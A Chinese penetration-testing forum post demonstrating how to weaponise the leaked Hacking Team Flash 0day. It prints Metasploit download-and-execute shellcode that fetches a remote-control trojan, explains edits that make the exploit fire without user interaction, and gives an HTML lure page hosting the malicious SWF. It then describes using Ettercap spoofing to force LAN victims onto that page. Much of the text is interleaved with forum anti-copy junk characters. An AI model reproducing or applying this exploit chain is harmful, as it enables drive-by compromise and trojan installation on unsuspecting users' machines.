中国网络渗透测试联盟

标题: flash 0day之手工代码修改制作下载者实例入侵演示 [打印本页]

作者: admin    时间: 2018-10-20 20:28
标题: flash 0day之手工代码修改制作下载者实例入侵演示

2 Y9 R$ }4 D6 {2 t* i1 Q 三、flash 0day之手工代码修改制作下载者实例入侵演示 3 L1 g: u7 H. l) M6 P( _" F

" U" J! @0 G- p3 ^0 x! f

5 h) h' ]) r! W+ E 利用到的工具: % P$ O* z7 R# i4 q2 z( Z

( S- G4 b" R/ `; ~8 T/ M) V6 u6 }1 i" Q

. ^0 O# H& Z; h; _ Msf . T3 a8 s7 Y9 @" c c9 {1 h% X4 W

, I2 k& f1 X9 S# H

) u4 n" g3 A$ z) {0 p( S Ettercap 4 S+ Y9 \4 l- ^% M6 ]$ L

9 h4 i- Z" U& ?5 p7 ]% j1 G" {7 A

% R% _# y8 i% o' @& q" s8 y7 A& j6 N Adobe Flash CS6 " y4 G- f5 }6 G) N2 j

4 D# T6 O8 [" m% _' M

X6 W! n% n2 H) o1 s8 a Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 % W' ~+ k+ ~1 h$ E3 ~7 F9 j

+ Y2 G, G# D. j% @, V! @( O- d+ \ f

, f; l3 m( ^, w! K 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_execshow options + S/ G) b6 j' d; ^( L5 X3 k

7 Q" s$ y9 j7 |

$ _: C6 d p" K/ i 如图: # [% V$ g7 u* r. g

& q" }' {7 \2 E/ q

5 }8 ?! e" Z! ^7 p4 b+ u   ) h" P+ ?' E* m7 D) Z

. ]3 B2 i, A) L9 }

8 i6 M' y+ s& O% g7 N   ; Y" w0 x ~# j) g& D O, ^+ F6 V

; H( s6 _. N Y" D1 j7 |0 q

8 s- ^9 v. d R! B J 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: $ a ^" w v4 i. W6 v

5 N3 u F5 e- \$ {" [6 i* v- y

, ]4 g- H3 g' J' y! Y1 J   5 {( O/ h; T' n! ]( \

+ ]( h3 b0 e2 Z- m0 ^

& [7 d- Z! o2 |' n+ }   ) F, A) t# M! p9 ^: o$ s( _

) i) m7 t! |; G' l; V4 j G1 Z% w, ~

8 |2 P. }. F2 h1 U1 G* i 然后执行generate -t dword生成shellcode,如下: ' i6 ?) {3 t" Q3 N

3 ^3 O- B/ Y% g9 Z

7 b t1 g/ l( ]- Q. V# X+ B& D) ?& Y   ; I. }; y ?& ^& D

L- {7 B" U5 D) u" J* J; _* d

& o+ b( I6 Y. t, t7 ], I 复制代码到文本下便于我们一会编辑flash exp,如下: 6 g( |. f' W8 ^6 i- P2 j9 u

, p' t |/ Y, _) ~; i

_. _& J' y. c$ q# I3 \ 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, 0 E! v4 r+ g& U9 q

# I; Y/ r6 \' v$ a. A& Z" W

* \ K4 O! ?, A* e% V/ v2 k. d 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, 8 H% K. z! M! }' J

5 ?1 D1 A7 Q+ _- Y, I" _. h

% b6 K" L G( d, {" o6 |2 G% U 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, 8 Y/ k# D3 ~- g& c0 e, k' ^# ^

+ \4 ~) |6 l ?

; B- m( }- _7 v/ v/ G% q) z* t 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, $ o0 w( x3 A" W. Q" n1 t- f

+ |' Q3 r0 j: T6 [7 s3 \2 b

. ]4 y9 _& V. Q( a" K 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, ) R+ X, ]' @- U" ]7 O( F7 S

0 M3 i) u7 N( o( Z1 W# ^( X

7 ?3 _7 W! w) g 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, ! |8 O5 V5 z3 [8 J8 U& i/ ^# s

9 @! [0 v$ j' Z: R( L% }( F

0 W7 F; g1 m9 z3 J 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, - @; _2 \! V' R! G# Q

/ D+ a" x9 O8 T4 X, E

; s7 ^; J3 {( n5 \0 S1 c' k' ^ 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, ; ^ X% X" ~' ~2 d9 x

! @4 h& M7 Q& U& s5 t

& o7 J/ J) {3 T: V' T0 A3 u 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, % a4 e2 H: _, w5 a

; J5 z( {% r9 x; E$ d* p

) o+ P: w$ Z6 g5 ? 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, - }& T$ s# }# g# Y! x( D

" F+ v) n" E+ w5 z: ~

$ Z5 D4 |! A+ r: ~ 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, : G6 C5 b+ o$ k. w

# K$ |. X$ q |2 r4 h

7 K/ ~# S( O4 i2 c0 V 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, 0 Z _2 ? G( k% v2 s

- S0 l. {+ @/ W1 `$ F6 X- V; F

6 h; A5 T# q6 p. w) m 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, 8 U' |( y! p. g q) d2 a6 v3 ~

. i0 _5 {/ C+ n+ M7 [

( t" T6 \% o \ 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 ' v6 Q9 R# W' E6 t! P

" ~/ z" G: Z9 M

8 m+ _2 L8 t( N. {   * z; o0 p& e2 J+ ~, z

5 o- D1 n1 `4 Z- E5 D: H3 b

. A0 B5 D) F: G6 A   7 C F& @5 |# J4 G. Y

6 {; w. Q" M+ B$ M7 I

# G: k, V! u: H6 o: | 下面我们来修改flash 0day exp,需要修改三个文件,分别为: 3 X& w+ z7 W! `* R

: s E0 h2 w7 r$ m

- {3 C& G' r% t b   " N% _8 g6 }) T/ L" y7 w( r! S

7 h0 R+ _3 u3 N- ~3 v/ P

1 _% H1 |# E" k* M% k- \& } o 先修改ShellWin32.as,部分源代码如图: / g) ?9 `' c' o

, r/ v4 z4 K4 ~% p3 H! m

; k+ d3 q/ f9 e   & M& ?$ d8 E, h& e2 K

* i/ `3 g: ~) G0 _1 K: X5 L

4 O+ G9 C1 y% O3 v8 a 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: ; U. a: O9 x) E6 |

* w2 j! [: d4 m5 P: L+ a

& \) `! u+ S1 `# {9 V& M   : M6 k0 r, j7 N

: o, Z0 G$ ?( t( d

! H0 S" j" W* v4 v/ i) }+ e& b 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: 4 F% y/ d. g0 U) y9 F: D( ]

4 \4 K, x) {2 o6 n8 U4 p8 N

& B; g6 |! @9 ^$ K3 C; z   * Q( r* R; u$ H( b. `! H

* t9 I! a1 ]1 L9 j) m$ b& I" {. |

: Q: F2 ~# a# n( P0 J 换行在后面加一句TryExpl();注意是l不是数字1,然后如图: V5 x: p% F: ]& f" d

* _, O( A9 G" G* C

* U( t' Q8 D5 y5 O. i   ?8 Y4 d H! Y

& d) S! `! Y! |8 M

. R ?8 C/ A0 K' z   2 a1 L' T$ y8 @0 O, D+ v

( l) e6 n% Q- O! F/ [4 M2 ], U5 o

; w3 i, I0 K+ K; S9 V) \* l   8 Z6 ^4 j7 G. w' j8 ^& d+ |+ q

: c+ ^5 a' `0 W* ~4 A# d S6 S# V

& t/ I. T3 J/ c& t 然后点保存,下面我们来编译一下,打开 4 v8 O6 i* w1 u H$ i: X

- d/ Z: j! k k+ f

/ _+ l* j+ Z7 h" }* I exp1.fla然后点文件-发布,看看编译没错误 0 M; c9 D& Y7 ?5 V/ m# m1 T. q" U* v4 ~

) C v9 b) M m, T

& q; o. _ I) w( v% B) G1 U   # n4 F& @4 \; g% }+ S+ D8 o

) j2 K# l6 e Q! e8 R; P

7 ^ D" V" K2 C3 p   * k7 z4 [# [$ N. m3 D

7 u; b a6 V% s) q' a

2 ^. m4 e$ k- K- ]3 M% B   5 x$ U$ F4 Y/ U. b" S) V

; e1 |& v! ?" u+ d

# V+ a- Y( H0 _, S8 Y   & z2 J+ h9 [& f

% ~- p- B- T, S! L* x j# a

& j9 `; I( Y, s' ?8 ]5 L6 f1 t5 d 然后我们把生成的 ; i4 Q% t4 W4 \7 i" \

% s- |1 h" }* ?. @

5 u) K" y; N. s exp1.swf丢到kailinux /var/www/html下: . |4 \$ T7 o, l( e. M, `, f

5 B+ _& p! F) X1 A

$ j( r5 z2 C% z+ S7 z 然后把这段代码好好编辑一下 , l6 o% `$ H) t+ x2 D

' J3 v: R- S8 ]

) |) h p1 i9 l. J, F( J   * X8 V. l' j+ C- f

6 p* D5 }* V1 p6 O

8 Q6 r. ]% o! ]4 v' R   7 S* A! e5 F& d$ R( s- r; l

$ v, _" H+ L) u0 y1 p- B

# J; N9 Z, u: M   ( l" ]3 A' w+ P: s1 a0 L' l

; [* Z2 P3 m M+ _2 [: A

: A6 h) U) n8 _: T; W: y   % z) j9 i9 \7 c$ i+ G j

& S( [3 L3 }7 W9 N0 S

2 U/ v J: _; c1 H v# }0 v% O3 P   : \% b p7 p+ R; o* H5 ^7 J

" f; o# h8 v+ V5 a5 Z( W& |# v

% R6 w) ^* I% s- c( l2 F   4 J2 t: b5 a: Z+ [+ C% C9 V

/ |2 M9 f9 Y/ T2 L

8 `4 N* q5 i, g9 i" V <!DOCTYPE html> . F: d, \, e! H1 k

) H3 C2 ?, a- [5 v; m+ K

6 e1 V9 D# u7 Z( S <html> a) \; C( p$ D( b

0 L3 Z* M5 \- b! }. c+ C: b1 c

7 o/ q. E2 O! C$ B* P <head> % G2 P8 d/ N* R" g

3 R: l0 R7 t3 w' G# `

$ `8 }0 K% i, R* z% j <meta http-equiv="Content-Type" content="text/html; ' ?: N4 L0 c0 M# b$ s8 G

- v4 J* f8 Q) |6 A

; Z. b7 v' O2 D6 i3 v charset=utf-8"/> 9 d$ |& Z. ?9 { \8 k! _

) Z2 D5 _2 K5 E% P' A

; B" J3 \% L+ X7 ~# P </head> + P0 c9 w; G& V# e' ]$ F

2 }7 }* E% M6 K" [ t

/ K! V9 r' l# _" p2 Q t# U2 V0 I <body> ! \1 i) q" W1 W) J0 k% P* \

. N, Z0 Q0 M/ x8 a

8 ~9 J0 {6 v# i7 o) S; \; K <h2> Please wait, the requested page is loading...</h2> ' T% ^5 g0 k4 g' B3 [

) ~9 D: t( @% U0 ]# Q) s

n' c" j& I* i; _+ y( E <br> G; T" s/ n4 t4 r' E) _

! o7 [8 ?1 h4 [8 x

' g/ |& w1 x0 P, F+ D5 q, x0 @ v <OBJECT 5 C* g. k( [# ~

/ e; y/ I; z- O; E5 d

$ n7 c7 q. w& H/ d# c$ m classid="clsid27CDB6E-AE6D-11cf-96B8-444553540000"  WIDTH="50" HEIGHT="50" id="4"><ARAM NAME=movie & _/ N1 [" }! Z" A

* w7 N4 l) ^; w5 T# r8 @

7 ]) V) y* M5 f4 T+ g VALUE="http://192.168.0.109/exp1.swf"></OBJECT> 7 c: W0 M, E6 V0 R9 l8 @- j

3 @* H O# v- j4 X# B; E0 V( v2 r

( J; q" T7 ]; G </body> 2 X$ T5 c" X7 c# x

; ]0 v8 n* b8 H$ C, ~3 H- e

8 i5 k' y. [$ b# ?% ~: @0 F' g <script> 3 b. ?3 u$ {; Z/ G8 s* h

8 k- p) r3 F' J! x- o# f D

. J( s1 V: A0 R5 T6 g1 s     setTimeout(function () { 3 L0 x1 I# @3 m. X" K

6 i$ b% a+ U z$ d

1 l+ }. p, V4 I$ l: A& M( \          , t5 f/ n& p/ ]& i( G

1 g1 ~. H: T" f1 X; `

3 r5 l, q6 H" a' x window.location.reload(); ) D e; P' n+ ]+ v$ A

( I( h, z# O$ I& ^, r

1 u9 D8 I' N9 W1 B6 _5 I" S, M2 z     }, 10000); 0 C# E- Z" t3 h% f, d

- H5 @# I" ^# X/ W

) f0 j. W1 b* @* H   6 F& g+ d# l$ Y% ?, n0 \

6 e- W6 c( N3 b8 y

0 W. u ~" R* w: `; J7 v. X) H, x </script> ' A! O% G# n- k) ~# X

, k$ Z; {# V% M, D" _; T4 Y8 R( d

9 K, U! V7 q4 p+ Z </html> . L+ u& }( O$ f

9 D% r2 d; M* y3 N) W* c9 C9 X

3 N. v: i- y3 i8 e- k   9 u# k$ `; |9 G; P* }5 E6 P- J" J2 ~

/ u0 h! L' c( y$ @) x# S. K

7 S7 O! P7 c1 D 注意:192.168.0.109kaliip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: # K- t0 I( e: ]& q1 F. j* p8 d! ]4 O$ |

- Z7 L; E) m. g. V5 I8 {* c) G3 @

; P+ l9 i/ J2 R4 M   / G+ p$ m- ]' y: P! o' k

: D6 r$ ^# [6 p% u1 s

0 M: y, L! S' G* M ], T   - S9 l+ M9 q" [2 w$ U

, C! }6 }8 u. k6 g4 j4 [$ G

* a( ^% B; P. {+ k5 ~/ [0 w* k   / T e, c, c: Y0 T# \- W( `; h

8 f! n7 @8 S0 Y9 f

/ `% G( c p: p3 y w8 n   " ^$ D/ l$ g" {) |# ^

7 W' S( C+ B9 }" m0 E

. k6 `4 f2 [% R8 `" s   " Y! K/ n& z: k4 [' W. F, Z$ w

- g" R7 p% B: h

( s H, G7 c: i2 R: m+ O) H 下面我们用ettercap欺骗如图: 0 }: T, B" ^4 S8 k4 f

4 v# S' @ e) `6 _9 }5 G& \

! R. m+ _7 _9 ?, r0 u ^5 q7 e   / |/ d& j' q% y0 I$ u* m! R

4 s; M5 L0 w: U" n& l/ L

- p$ [& Z. r7 T4 a2 k' l4 [   " b( C* E) {' t( d0 @4 k. y4 f

; i, `5 E. s; o" e: t

5 \! l3 H. p+ S5 A8 ?' E* K: _ 下面我们随便访问个网站看看: 7 A- v3 w9 i3 n) A

9 _ a# A0 i5 n" @( f

1 e: M1 [( x0 h/ D& J 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: 5 p* G5 l$ l0 ?/ h1 I4 U7 S/ t1 z

/ y- P1 s6 c% `& p/ W

% |) y5 X1 \) B* I8 I% O. U$ G' @& I/ l   % C- K! \ g' p' R5 m

3 C0 G$ }2 a) ]& s7 T2 B! u

6 ?. w! L+ E3 F1 L 我们看另一台, # p. P @( j# e% Y z7 w. h; W

1 ?' @0 r3 L1 |! _; V2 r1 C

, Q7 B5 [: @, j! v' a 提示这个错误,说明木马是成功被下载执行了,只是由于某些原因没上线而已。。。 5 C: R: { @" Z' s* a






欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2